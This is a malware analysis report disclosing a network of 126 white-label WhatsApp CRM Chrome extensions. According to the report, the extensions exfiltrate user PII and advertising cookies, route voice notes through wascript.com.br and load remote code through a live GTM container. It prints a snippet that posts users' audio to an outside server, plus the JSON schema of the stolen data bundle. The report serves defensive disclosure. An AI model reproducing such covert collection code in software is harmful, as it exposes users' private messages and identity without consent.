WaSteal: 126-Extension WhatsApp Data Collection Network (wascript.com.br)
Indicators of Compromise
| Field | Value |
|---|---|
| Platform | wascript.com.br (Brazil), internal name "watidy" |
| Network size | 126 live Chrome extensions (150 IDs registered in platform code) |
| Total installs | ~148,000 confirmed across all variants |
| Largest variant | illemhbijpiebjfilfmgebahaakajkpe (WaSeller) - 100,000 installs (67.6% of network) |
| Version analyzed | 7.4.3.38 |
| Last updated (all 126) | 2026-05-12 (simultaneous push across entire network) |
| Shared platform cript_key | ffce211a-7b07-4d91-ba5d-c40bb4034a83 |
| Backend C2 | backend-plugin.wascript.com.br, backend-utils.wascript.com.br, painel.wascript.com.br |
| Audio exfiltration endpoint | https://backend-utils.wascript.com.br/api/audio/convert-ptt-base64 |
| Remote code origin | https://extractleads.com.br/teste/header.js, body.js, footer.js |
| Obfuscated throttle key | 8fd5ad24df1e1b800d670e563b1b83591980060a== (localStorage) |
| Live GTM container (WaSeller) | GTM-KMZ9CZK (hardcoded in WaSeller pixel config - persistent remote code channel) |
| Sample variants | illemhbijpiebjfilfmgebahaakajkpe (WaSeller), gjlfpggiddcminhebiejofeglfjmleli (waTidy), eolijkhfnnodhepiglajhkijjbcndiea (FR VENDAS PRO), jeicljefnlpdoblklfdephbpihhjgphf (ENOCRM) |
wascript.com.br operates a white-label platform (internal name "watidy") distributed across 126 Chrome extensions that collectively present themselves as independent WhatsApp CRM tools for Brazilian small businesses. Every extension in the network shares a single codebase, a single backend infrastructure, and a single behavior: silently routing voice messages through wascript.com.br servers, exfiltrating advertising tracking cookies and user PII to operator-controlled webhooks, and injecting a full WhatsApp internal API bridge into the browser. The largest variant, WaSeller (illemhbijpiebjfilfmgebahaakajkpe), holds 100,000 of the network's 148,000 confirmed installs and additionally embeds a live Google Tag Manager container (GTM-KMZ9CZK) giving its operator a permanent, unauditable remote code execution channel. None of the undisclosed behaviors are disclosed to end users across any variant.
Methodology
Findings are based on static analysis of extension bundles obtained from the Chrome Web Store. The 126-extension network was surfaced using internal tooling that clusters Chrome Web Store listings by shared code fingerprints, backend infrastructure, and behavioral signatures across manifests, content scripts, and injected page-context bundles. Each variant was individually verified to share platform key ffce211a-7b07-4d91-ba5d-c40bb4034a83, the wascript.com.br backend endpoints, and the behaviors documented below.
No requests were made to wascript.com.br infrastructure beyond what the installed extensions initiated during normal operation on researcher-controlled WhatsApp Web sessions. All findings are reproducible from the published bundles. SHA-256 hashes of analyzed files are listed in the appendix.
Bundle structure
The extension is a Vite/Rollup ESM bundle with approximately 235 chunk modules, plus a 601 KB injected IIFE (whatsapp/index.iife.js) that runs in WhatsApp Web's page context:
- CRM UI modules - contacts, scheduled messages, quick replies, funnels (legitimate)
- Automation engine - message dispatch, follow-up timing, chatbot flows (legitimate)
background.js- install beacon, periodic polling of remote DOM selectors, alarm schedulerwhatsapp/index.iife.js- page-context WhatsApp API bridge (the primary attack surface)- Webhook event dispatchers - chunk65.js, chunk108.js, chunk21.js (the exfiltration layer)
- White-label registry - chunk4.js embeds all 150 extension IDs and their per-reseller pixel/webhook configs, including WaSeller's live GTM container ID
Advertised functionality
The extension legitimately provides WhatsApp Web CRM features: tagging contacts, scheduling messages, storing quick-reply templates, running multi-step automation flows, and a basic sales pipeline. These features require injecting into https://web.whatsapp.com/* and reading contact and chat metadata. The manifest declares only tabs, storage, alarms, and unlimitedStorage permissions - no microphone, no clipboardRead, no broad host permissions beyond WhatsApp.
Undisclosed behavior: PII and advertising cookie exfiltration
Once every 24 hours, on login to WhatsApp Web, the extension silently POSTs the following bundle to WaSeller's operator-controlled webhook URL:
{
"user_id": "...",
"name": "...",
"email": "...",
"email_auth": "...",
"whatsapp_plugin": "<device fingerprint>",
"navigator": "<user agent>",
"whatsapp_registro": "<phone registration>",
"campanhaID": "...",
"cookies": {
"_fbc": "<Facebook click ID>",
"_fbp": "<Facebook browser fingerprint>",
"_ga": "<Google Analytics client ID>",
"_ttclid": "<TikTok click ID>",
"_ttp": "<TikTok browser fingerprint>"
}
}
- On WhatsApp Web load, the content script reads the user's stored profile (name, email, device ID) and calls
Conn("getMyDeviceId")via the injected WhatsApp API bridge to obtain the hardware fingerprint. - It reads
_fbc,_fbp,_ga,_ttclid, and_ttpfrom browser storage - cross-site advertising identifiers set by Facebook, Google, and TikTok pixels on other websites the user has visited. - It checks
localStorage.getItem("8fd5ad24df1e1b800d670e563b1b83591980060a==")- an obfuscated key - to determine if 24 hours have passed since the last send. The key name serves no functional purpose; its only effect is to make the throttle invisible to casual inspection. - If the throttle clears, it POSTs the full bundle to the reseller's webhook URL, which can be any arbitrary endpoint on the internet.
The cookies field is structurally parallel to the StealTok pattern: advertising identifiers set by third-party sites are silently harvested and forwarded without user knowledge or consent. Recipients can use _fbp/_ttp to link the user's real identity (name, email, phone) to their cross-web browsing history, or build Custom Audiences on Meta/TikTok without a legitimate customer relationship.
Undisclosed behavior: live GTM container as permanent remote code execution
WaSeller's pixel configuration in chunk4.js contains a real, live Google Tag Manager container ID:
google_tag_manager: "GTM-KMZ9CZK"
This is not a placeholder. GTM-KMZ9CZK is an active container. When the extension panel loads, this GTM container is injected into the page. From that point forward:
- The WaSeller operator can push any additional JavaScript to all active WaSeller users from the GTM dashboard - with no extension update, no Chrome Web Store submission, no review, and no user notification - ever.
- GTM scripts execute with the same privileges as the extension panel page, which runs in the context of an authenticated session.
- This channel persists as long as the extension is installed. There is no mechanism for the user to audit what GTM has pushed.
This is structurally identical to the "update URL" remote code execution vector documented in the StealTok campaign (LayerX Security, 2024), but implemented through a legitimate, widely trusted advertising infrastructure tool rather than a raw HTTP fetch - making it harder to detect and block.
Other white-label variants in the network use placeholder GTM IDs; WaSeller's use of a real container confirms that this channel is actively operational for the highest-user extension in the network.
Undisclosed behavior: voice message interception
Every audio message sent through the extension is intercepted before delivery to WhatsApp:
const S = async (base64Audio) => {
if (base64Audio.startsWith("data:audio/ogg;codecs=opus")) return base64Audio;
const { data } = await axios.post(
"https://backend-utils.wascript.com.br/api/audio/convert-ptt-base64",
{ base64: base64Audio }
);
return data.base64;
};
The full base64-encoded audio is transmitted to wascript.com.br servers before it reaches the intended recipient. The stated purpose is format conversion, but the effect is that every voice note passes through a third-party server. Under GDPR Article 9, voice data may qualify as biometric data (special category), requiring explicit consent - none is obtained or disclosed.
Undisclosed behavior: runtime arbitrary code execution from extractleads.com.br
White-label variants in the network - including those sharing WaSeller's platform codebase - configure external JavaScript URLs in the script_head, script_body, and script_footer fields of their panel pixel configuration:
https://extractleads.com.br/teste/header.js
https://extractleads.com.br/teste/body.js
https://extractleads.com.br/teste/footer.js
https://static-files.watidy.com.br/header.js
https://static-files.watidy.com.br/body.js
extractleads.com.br is a Brazilian lead-generation company with no disclosed relationship to wascript.com.br. These scripts are fetched and injected at runtime into the extension's panel pages. Their content is not in the extension package, is not reviewed by Chrome Web Store, and can be changed server-side at any time.
The retrieved content of header.js confirms the mechanism: it is a server-side template that substitutes per-reseller pixel IDs at request time and then:
- Injects a Facebook Pixel (
fbq init+PageView) - firing a conversion event correlated with the_fbc/_fbpidentifiers already harvested from the user's browser, completing the attribution loop without user awareness. - Loads Google Ads (
gtag) and Google Tag Manager into the extension panel page - layering a second GTM injection path on top of WaSeller's already-active GTM-KMZ9CZK container. - Appends a customization hook (
"Adicione conteudo personalizado") confirming the file is designed to be extended with arbitrary additional behavior per deployment.
Undisclosed behavior: WhatsApp internal API bridge
whatsapp/index.iife.js (601 KB) is injected as a <script> tag into the WhatsApp Web page context - bypassing the content script sandbox. It exposes the following WhatsApp internal module APIs via a postMessage bridge:
BlockList, Chat, Group, Conn, Contact, Functions, Labels,
ListChat, Msg, MultiAtendimento, Profile, Status, Utils,
Webpack, DomSelector, IA, Whatsapp
This gives the extension programmatic read/write access to the user's full contact list, all chat conversations, and message history. The Msg module allows sending messages on behalf of the user. Three calls to analytics.google.com/g/collect are present inside the IIFE, meaning Google Analytics telemetry fires from within WhatsApp's domain - constituting cross-site tracking against WhatsApp's own users.
Why the consent framing does not matter
There is no consent gate visible to the end user. Users install WaSeller as what appears to be an independent CRM product. The underlying platform (wascript.com.br) is not disclosed anywhere in the user-facing product. There is no privacy policy link on the Chrome Web Store listing.
Even if a user accepted a generic ToS, it would not cover:
- Forwarding advertising tracking cookies (
_fbc,_fbp,_ttclid,_ttp) to operator-controlled webhooks - Routing voice messages through wascript.com.br servers
- Injecting live GTM container
GTM-KMZ9CZKenabling unlimited future code pushes - Loading and executing code from
extractleads.com.br, an unrelated third party
The obfuscated localStorage throttle key (8fd5ad24df1e1b800d670e563b1b83591980060a==) demonstrates awareness that the exfiltration behavior should not be easily discoverable. The remote DOM selector fetch (every 10 minutes from painel.wascript.com.br) means the extension's page-access behavior can change after installation with no store update and no user notification - so even initial-install consent would not cover future behavior.
Infrastructure
| Domain | Role | Disclosed? |
|---|---|---|
backend-plugin.wascript.com.br | Auth, install/uninstall telemetry, license checks | No |
backend-utils.wascript.com.br | Audio message interception and format conversion | No |
painel.wascript.com.br | Remote DOM selector delivery (runtime behavior control) | No |
audio-transcriber.wascript.com.br | Voice transcription (receives full audio content) | No |
multi-atendimento.wascript.com.br | WebSocket - real-time multi-agent relay channel | No |
api-whatsapp.wascript.com.br | WebSocket - WhatsApp event relay | No |
app.wascript.com.br / dev.watools.com.br | Panel login origin (externally_connectable) | No |
static-files.watidy.com.br | Runtime external JS injection | No |
extractleads.com.br | Runtime external JS injection (third-party lead gen) | No |
GTM-KMZ9CZK (Google Tag Manager) | Permanent remote code execution channel for WaSeller | No |
cobrancas.uppermesh.com.br | Billing/payments (separate company) | No |
wajsapi.titanchat.com.br | Alternative WhatsApp API relay (separate company) | No |
wppc-linkpreview.cloudtrix.com.br | Link preview proxy (separate company) | No |
analytics.google.com | GA telemetry fired from inside WhatsApp Web tab | No |
| Reseller webhook URLs | Receives full PII + advertising cookie bundles | No |
All 126 live extensions (150 IDs registered in platform code) share one cript_key (ffce211a-7b07-4d91-ba5d-c40bb4034a83) and one backend infrastructure. WaSeller (sigeID 11) is among the earliest registered variants and holds 100,000 of the network's 148,000 confirmed installs. FR VENDAS PRO (eolijkhfnnodhepiglajhkijjbcndiea) and ENOCRM (jeicljefnlpdoblklfdephbpihhjgphf) are among the other 124 variants running the same codebase.
Known extensions in the network
Data as of 2026-05-13. All 126 extensions were updated 2026-05-12. Publisher handles are Chrome Web Store developer account identifiers.
| Extension ID | Name | Publisher | Installs | First Published | Last Updated |
|---|---|---|---|---|---|
illemhbijpiebjfilfmgebahaakajkpe | WaSeller - Perder vendas no WhatsApp nao e normal | wsll | 100,000 | 2023-06-01 | 2026-05-12 |
gjlfpggiddcminhebiejofeglfjmleli | waTidy : CRM no whatsapp, Automacoes e Ferramentas para venda | wsll | 20,000 | 2022-03-16 | 2026-05-12 |
gjbfdbkfhgdfiieppgdpbglhjhljhhmk | WhaScale - Um passo a frente do seu concorrente | wty | 10,000 | 2024-01-04 | 2026-05-12 |
ghajfmiecdhdkifpapbjngmcdbedjmgg | WaBest | wty | 1,000 | 2024-03-13 | 2026-05-12 |
ajihoihfamedkfcknpgcelpbhdnadabg | PROSPECTA CRM | wspd | 1,000 | 2024-07-08 | 2026-05-12 |
gkdefmghclmhookpgciggdhglejpghoc | Whapro - Automacao, CRM e Vendas no WhatsApp Web | wspd | 1,000 | 2024-10-05 | 2026-05-12 |
jkeogjcccehfccanacclmckcdgepkifo | InterZap | wty | 1,000 | 2023-12-31 | 2026-05-12 |
gjdchlihfacnabnppldhmnimolipgnmj | SutoflyCRM, WhatsApp Web organizado, automatizado e vendendo | wsll | 935 | 2024-09-24 | 2026-05-12 |
npfamfonpecnjjbhalhdahlokadlblbm | Chatweb CRM : Transforme seu whatsapp em um sistema de vendas | ewdht | 870 | 2024-10-28 | 2026-05-12 |
elahghcenkbboillglflockiijbkejod | Hchat | wty | 846 | 2024-01-27 | 2026-05-12 |
mleloepbohmmgjcfacngpffcappdcdni | VMSender | mkt.solucoes | 595 | 2022-06-23 | 2026-05-13 |
njpegidkheieeecaiaaihggmnhklccjn | DragonChat | wspd | 540 | 2024-08-24 | 2026-05-12 |
jhokpeoaapahcoaigkfnienliabeaang | Disparo/Wa - Disparo no WhatsApp, CRM, Automacoes, Ferramentas para Venda | ewdht | 526 | 2024-11-30 | 2026-05-12 |
pdlpnkplaofpdajmgegfnlifmdlejmfp | Nextgo Zap: Seu Whatsapp Turbinado! | Intzp | 507 | 2025-01-22 | 2026-05-12 |
jadgponjpllhepidoclncpogkhcnepac | WaPROdy | wsll | 496 | 2023-10-19 | 2026-05-12 |
dfcngbjlmlakepppfaaepideejcbfcjf | WA Envio | wty | 482 | 2023-12-21 | 2026-05-12 |
foodgdffkpakghokjoemdblocpijcdgd | To Talk Connect | wsll | 479 | 2023-05-24 | 2026-05-12 |
afdhcpnimkgccfjcelgkiipidhebddjh | G5 Chat | wspd | 472 | 2024-06-23 | 2026-05-12 |
oghollmlfgpfdlailojlcpbbmjoeabhe | MARKETING DE FITNESS | wty | 440 | 2024-03-06 | 2026-05-12 |
jcjodbceolndbhnbljiedcanmglmhmop | ZarpGo | ewdht | 298 | 2024-11-14 | 2026-05-12 |
cbgghdpadjdmlelmkkonkcjiccajaoln | IA do Corretor | Stfl | 269 | 2025-03-21 | 2026-05-12 |
gnmmfdohfcohcflccikmlodaeignlkce | Whats Expert | ewdht | 261 | 2024-11-15 | 2026-05-12 |
gkkkdobapmhkaihggejlcdbjemfkhdgk | ZappyGO | wspd | 258 | 2024-09-12 | 2026-05-12 |
nlbdmcikemaghcoeoblmlkdlhiggnhin | CRM DE ELITE : CRM no whatsapp, Automacoes e Ferramentas para venda | ewdht | 225 | 2024-10-18 | 2026-05-12 |
kknnggmipdieldidejjflfceicjpcgdk | Organize-C Pro | whscl | 213 | 2025-12-21 | 2026-05-12 |
ahgellbcclklfinhliakcdgjnebickel | What Vision | whscl | 211 | 2025-09-13 | 2026-05-12 |
fefgeijhenfppagifhlfkjjadijghoea | Win7max - CRM no WhatsApp Web, Chatbot, Automacao e Disparo em Massa | ewdht | 206 | 2024-10-17 | 2026-05-12 |
echacghfmpmedednbkfoalmpccdiajci | CRMSIM | wty | 199 | 2024-05-07 | 2026-05-12 |
moodoffpaogeijclgpdicfnidnmeeeoe | ViaShopModa | wsll | 196 | 2024-06-13 | 2026-05-12 |
ffngpoeegbhbhpbkhbnilghielofekpc | App Vendas CRM | Stfl | 192 | 2025-06-10 | 2026-05-12 |
ngnffiapbonmlgijfnlcgbdomhgcmmna | Botzom - Vendas, CRM e Chatbot para WhatsApp | whscl | 188 | 2025-08-25 | 2026-05-12 |
cellckcnenolgakggljkichbmgmbibgb | Midia Medica Orientada | wsll | 161 | 2023-07-13 | 2026-05-12 |
jacgfjfdnjamjbdkihblimkekfoiiafi | WAFACIL | wty | 150 | 2024-04-06 | 2026-05-12 |
elicjcmfamohcfkpokcdhapngkadckpa | Chat Boost | wsll | 143 | 2023-08-14 | 2026-05-12 |
npeoblgjndfpphhdjlanbjalbccifpom | Mais Leads CRM | wspd | 120 | 2024-09-21 | 2026-05-12 |
ijdgdpgjggoehifckpmpdmfpnkdakkne | Verk - Direto no whatsapp, Automacoes e IA para vendas | Intzp | 119 | 2024-12-12 | 2026-05-12 |
ojpoinccmndjnfhhkgcbjmkfahfmppee | ZAPGYN | Intzp | 114 | 2024-12-13 | 2026-05-12 |
bhdaecfcjmipomgngjhacbfmjafjnicl | Smart WA | wspd | 113 | 2024-07-03 | 2026-05-12 |
pmkbdfddjmnceffcgdgfnenkngkkeheg | WhatsTime CRM for WhatsApp Web | wty | 108 | 2024-05-02 | 2026-05-12 |
bledopcgjbhnheppjbekbjnjnelmckdl | Wa Elo IA | Intzp | 96 | 2025-01-22 | 2026-05-12 |
gmidblfofjdiajmlnfiagijikmojkhia | SevenSales | Intzp | 96 | 2025-02-22 | 2026-05-12 |
dagelhckpadaagjpebgjfkccfnljcjmn | Pangeia | ewdht | 90 | 2024-12-07 | 2026-05-12 |
ahiieliljkcgmghicbgidblclkbklmka | Dental Chat - Gestao de leads e pacientes no Whatsapp para Clinicas | wspd | 88 | 2024-08-03 | 2026-05-12 |
pdckbaohagnmbkfjgobeaiiplolfckhm | wa To you | wsll | 85 | 2023-10-07 | 2026-05-12 |
abpcbpoghgmfjkkdoeknbldhkklpcmfn | Eddye | wty | 83 | 2023-12-25 | 2026-05-12 |
pcpdnigabekdogbajcacpbkebdfmaapc | ELITE | wty | 80 | 2024-03-16 | 2026-05-12 |
lfenojckeamfnllggndghkmfhkheiimc | UpSell | ewdht | 80 | 2024-11-28 | 2026-05-12 |
lecapbnkojjbcmpgojanclnilcnemjpk | SmartZap | Intzp | 78 | 2024-12-21 | 2026-05-12 |
okhjgjpafhnjbndkojddaicngefobnjn | Feel Up | Stfl | 72 | 2025-03-21 | 2026-05-12 |
olmbfmmlpodikepicechoekmiiejpmel | WA BOOSTER | wsll | 71 | 2023-11-09 | 2026-05-12 |
kmipafdabbpmampkcconideakdacmaln | BootComp | wsll | 70 | 2023-05-24 | 2026-05-12 |
hcbmcbkjjklkjidikpggmmfpfklcpnmb | ZAPPROFIT CRM | whscl | 67 | 2025-11-06 | 2026-05-12 |
dpahdbhekfclimkekdabboefohagelfp | Cliente Flow | ewdht | 64 | 2024-12-04 | 2026-05-12 |
aocojboaoklgedadlpaallelnanhcpgm | YOUSELLER - Facilidade, produtividade em escala. | Intzp | 63 | 2026-03-20 | 2026-05-12 |
ghfhbalboihigmncnabikapdldfdikng | FATURE MAIS | ewdht | 62 | 2024-10-17 | 2026-05-12 |
mahgiheajijdifhnekeknnkfkjbfjkdh | Acelere CRM | whscl | 58 | 2025-07-16 | 2026-05-12 |
acncpfocelnijeegfclfigffjgancfod | WhatSeller | wsll | 57 | 2023-04-30 | 2026-05-12 |
hknmlgmbiononigjnihhflhmmmhfbjpl | autozai - Otimize o tempo e multiplique as vendas no WhatsApp | Stfl | 57 | 2025-05-15 | 2026-05-12 |
ligmikomohkaooecoochfknopalblanl | Bull Lead - Automacoes e atendimento no WhatsApp para vendedores | wspd | 55 | 2024-09-26 | 2026-05-12 |
endfahndaiibchcbfaphnhanpckdhmll | WaMed | Intzp | 52 | 2025-01-03 | 2026-05-12 |
engjehngfignjpekjkpgjgapnlkndofk | SmartFlow | wsll | 50 | 2023-09-11 | 2026-05-12 |
pldfelebkfalpldhfbeagfgmmmelajlc | Zapbase | ewdht | 48 | 2024-12-10 | 2026-05-12 |
bgnkgembgfkfjipflkniiibgcedloekn | MULTIZAP CRM | whscl | 47 | 2025-12-21 | 2026-05-12 |
iibldfhmeiipohbjlkhfgnjhcmkknffi | AtendaZap | Intzp | 47 | 2025-02-19 | 2026-05-12 |
pgnmegacljodjeioihhjlcajngphbagf | EnZap | wty | 46 | 2024-03-06 | 2026-05-12 |
npcbkljcefmdegcjjghdfgfmnkmfjlba | LEEVO CRM | whscl | 46 | 2025-07-31 | 2026-05-12 |
pdfegaocpmmmomhgodfipbfmbikdajfj | WaPower | wty | 44 | 2024-03-13 | 2026-05-12 |
deaadbmkldfnondhdbbfoldamngpgahp | CRM TURBINADO | Stfl | 41 | 2025-03-28 | 2026-05-12 |
eolijkhfnnodhepiglajhkijjbcndiea | FR VENDAS PRO | Stfl | 40 | 2025-06-16 | 2026-05-12 |
gollbfedpcfodjgfjddbkfnkkfdedknn | Master Engage | Intzp | 39 | 2024-12-15 | 2026-05-12 |
bijckmbmblabepobmabjcegimlcpilml | DR.FIDELIZA | Stfl | 39 | 2025-03-12 | 2026-05-12 |
ephepidhbiabcalednafkdpllnnohnph | DGUESTS | wspd | 38 | 2024-06-19 | 2026-05-12 |
ekmdldnjhmffdbihkfannnmloccnmemn | Talk Mais | wsll | 38 | 2023-07-07 | 2026-05-12 |
nenopmledlfnfcgjdkdefhegeajjpfgf | AmizApp | Intzp | 36 | 2025-01-03 | 2026-05-12 |
dfeojjampcncbhemefhadnnokdjdfomd | EAI + | whscl | 36 | 2025-08-15 | 2026-05-12 |
cicmfpphdicmiaphcmjpcapphlnooglp | FocusLead | ewdht | 34 | 2024-12-05 | 2026-05-12 |
bdcoljfgfbdkmjeabhnpgddpiopccleo | WhatsSelling | whscl | 34 | 2025-09-11 | 2026-05-12 |
pckoggnahgjephjpcmfnhfolbmenkdjp | SellUP | Intzp | 34 | 2025-02-11 | 2026-05-12 |
nddkllhdjjgopaibekmobibbmoedkdmj | Vluw | whscl | 33 | 2025-09-21 | 2026-05-12 |
ejenghcfiaehahmeklcojkhpamicfjol | JURIMIND CRM | Stfl | 33 | 2025-06-16 | 2026-05-12 |
dhpgneegbflgangnpfeoafgpabacholj | WaListall - O Melhor CRM para WhatsApp Web | ewdht | 31 | 2024-12-10 | 2026-05-12 |
imgjapefioodjkjipgpnohmceghomkmb | WaClinic | wty | 29 | 2024-05-16 | 2026-05-12 |
kmmibpooeblhmpbphojdncfdlfflecab | WaContact | Intzp | 27 | 2025-02-11 | 2026-05-12 |
emhembimlgjkalegifeijlilginlnano | ClickZap | ewdht | 26 | 2024-10-28 | 2026-05-12 |
okiccdcmkdhldgbclikganfldepocmmd | Ninja Ads | ewdht | 24 | 2024-10-30 | 2026-05-12 |
cbfeaklofemfhdlajmnlbdadcmbfaakc | Gera Cliente - Extensao do Whatsapp para vender ate 4x mais | Intzp | 23 | 2026-03-20 | 2026-05-12 |
comknamophhecgmcchgcclmcodohlfap | SPEEDYX | wty | 22 | 2024-03-21 | 2026-05-12 |
mkjmckhlecedggnpbefkgehebkickghd | ZAPARETO | whscl | 21 | 2025-07-31 | 2026-05-12 |
mpmccehgdjojicnlcmmdoogohdamlfpp | DigitaZap | wspd | 20 | 2024-08-28 | 2026-05-12 |
aajdkangkldmljmoaoehmbnchdjkgojk | WAME | Intzp | 19 | 2025-01-18 | 2026-05-12 |
jeicljefnlpdoblklfdephbpihhjgphf | ENOCRM - Gestao de Leads no WhatsAPP | wspd | 19 | 2024-09-17 | 2026-05-12 |
pcjidgpofjkoaelajgfdecebigjiojcn | WATHOR | Intzp | 18 | 2025-02-14 | 2026-05-12 |
nfhbefcgpghdaaebjafocolpadkdedef | WAPIN | wty | 18 | 2024-06-02 | 2026-05-12 |
jkflhidejcmhenikpjhidoofogahicjp | RED Chat CRM | Stfl | 16 | 2026-03-17 | 2026-05-12 |
cbaabfpflhiklcjgkjjhfjelihkgondn | WAction | Intzp | 16 | 2025-01-03 | 2026-05-12 |
jkblcpmoooocmdcfjojdecccejlkicap | MERLIN BOT | Intzp | 16 | 2026-03-20 | 2026-05-12 |
aehakeblnhhdddmglmolkjcdjblghjbm | Agencia Guedes | whscl | 15 | 2026-01-10 | 2026-05-12 |
pihbjpjjgpejkbjmpijpmmolaehlbafc | talkspeed | wspd | 14 | 2024-08-10 | 2026-05-12 |
hkdbocoaofpdmbbgpimdkhcafenpkikn | WATEND | whscl | 14 | 2025-08-16 | 2026-05-12 |
beeemlkkaejmncamaeeahkbibhapgpeg | Gestor B2B | Stfl | 14 | 2025-05-01 | 2026-05-12 |
cfbgbmdpdkmdpdpchmhpkkdcolpgnode | Monitora Leads | wspd | 14 | 2024-07-28 | 2026-05-12 |
jaonmiiccahaddjkdhaonhfhdiagfbdh | Waat: CRM e Vendas no WhatsApp Web | ewdht | 12 | 2024-10-18 | 2026-05-12 |
okmklmkaficfbcebbggmjmphhipflhme | IronZap | ewdht | 11 | 2024-11-24 | 2026-05-12 |
abkolnpebgghiglkkdjcgjgbpnddmfmp | WAVENDY | Intzp | 11 | 2026-03-20 | 2026-05-12 |
bjhbgbfapjofmjcoonncefneakppmkmo | PRAXATECH SOLUCOES | wspd | 11 | 2024-07-31 | 2026-05-12 |
bkkcobflaheefjdhejdbogmhpojphhhf | UATZAP CRM | Stfl | 10 | 2025-07-02 | 2026-05-12 |
bgaaamckjapoiaiioklgmbknjegdkkhd | CRM-PRO : Transforme seu whatsapp em um sistema de vendas | amhgforres | 9 | 2026-05-04 | 2026-05-13 |
fhgjdkfbeghkbgjjkkkldiemdcboimmi | Primeira Classe | Intzp | 9 | 2024-12-14 | 2026-05-12 |
hecbfkaeblempihjgpoeapkpjnkhlmli | wazippy | Stfl | 8 | 2025-04-16 | 2026-05-12 |
aidmcapfnmaopagoclmgncjeegknibpd | KASAPP | whscl | 8 | 2026-02-02 | 2026-05-12 |
pppeaodmafhlepccbpnjhobmokplfkjb | YouZapCRM - WhatsApp Web com poder de CRM, automacoes e muito mais! | Stfl | 8 | 2025-04-16 | 2026-05-12 |
ldhkdnjdpdknckckaoafnaipmclhnfbf | Salezap | wspd | 7 | 2024-09-12 | 2026-05-12 |
bpgbjcgkegcecddlnlckjcoddhpmekdh | waSuper | ewdht | 7 | 2024-11-04 | 2026-05-12 |
kiobbadnbgllphgkigmkahaimkmamfln | VUTTI CRM | Stfl | 7 | 2025-07-02 | 2026-05-12 |
flfjappofhfkljghalmpfnnhllokpami | WORKZAP | Stfl | 6 | 2025-04-06 | 2026-05-12 |
bddkejibhlhebhfpbhjbgfnpkmgoboaj | ZAZMAX | whscl | 6 | 2025-09-05 | 2026-05-12 |
adjmmdjciklooaidchgnmbdjmmgobcnc | zapboost | Intzp | 5 | 2024-12-18 | 2026-05-12 |
gadlhgaecbhahkiojnnfnkklomflhifh | WAURA | wsll | 4 | 2026-02-02 | 2026-05-12 |
bbbifilhkmefbakdfjnamkneldmocibp | MI CIERRO | Intzp | 3 | 2026-04-02 | 2026-05-12 |
deglljpibacfneponmjilaopemcdohle | ZAPFY CRM | Stfl | 3 | 2025-03-03 | 2026-05-12 |
cplaeebopfpnoebkaimlibpdickcjofa | BALTZ CRM | whscl | 3 | 2025-11-13 | 2026-05-12 |
ikliliinakofoiojghnipegfphmoljla | Kentro | Intzp | 1 | 2026-03-20 | 2026-05-12 |
ckfolfphmhnhimichgialimbohkfkmpp | KFarias Inovacao Tecnologica | Intzp | 1 | 2026-04-02 | 2026-05-12 |
plahbdekkijmgefopapakkhcogooghlk | JJCA | Intzp | - | 2026-03-20 | 2026-05-12 |
fnhnkcmbkibeacgbhloapcdgmgfdnpcc | WATSELY | Intzp | - | 2026-03-24 | 2026-05-12 |
logefefpibkofniajhdigjnpbmimjelg | KENVIA - Transforme o seu WhatsApp Web numa plataforma de vendas | Intzp | - | 2026-04-02 | 2026-05-12 |
Summary
WaSeller is the highest-user extension in a 126-listing white-label network operated by wascript.com.br (Brazil) that collectively impersonates independent WhatsApp CRM products while running a shared data collection infrastructure. Every user's WhatsApp Web login silently forwards a PII bundle - including real name, email, WhatsApp device fingerprint, and cross-site advertising tracking cookies from Facebook, Google, and TikTok - to the reseller's webhook, with no disclosure and no consent mechanism. Voice messages are routed through wascript.com.br servers before delivery. WaSeller specifically embeds a live Google Tag Manager container (GTM-KMZ9CZK) that gives its operator a permanent, unauditable remote code execution channel into the browsers of its entire user base - without any extension update or Chrome Web Store review - making it the most operationally dangerous variant in the network.
Research by Jean-Marie R. (Toborrm9) | Malicious Extension Sentry Project | May 13, 2026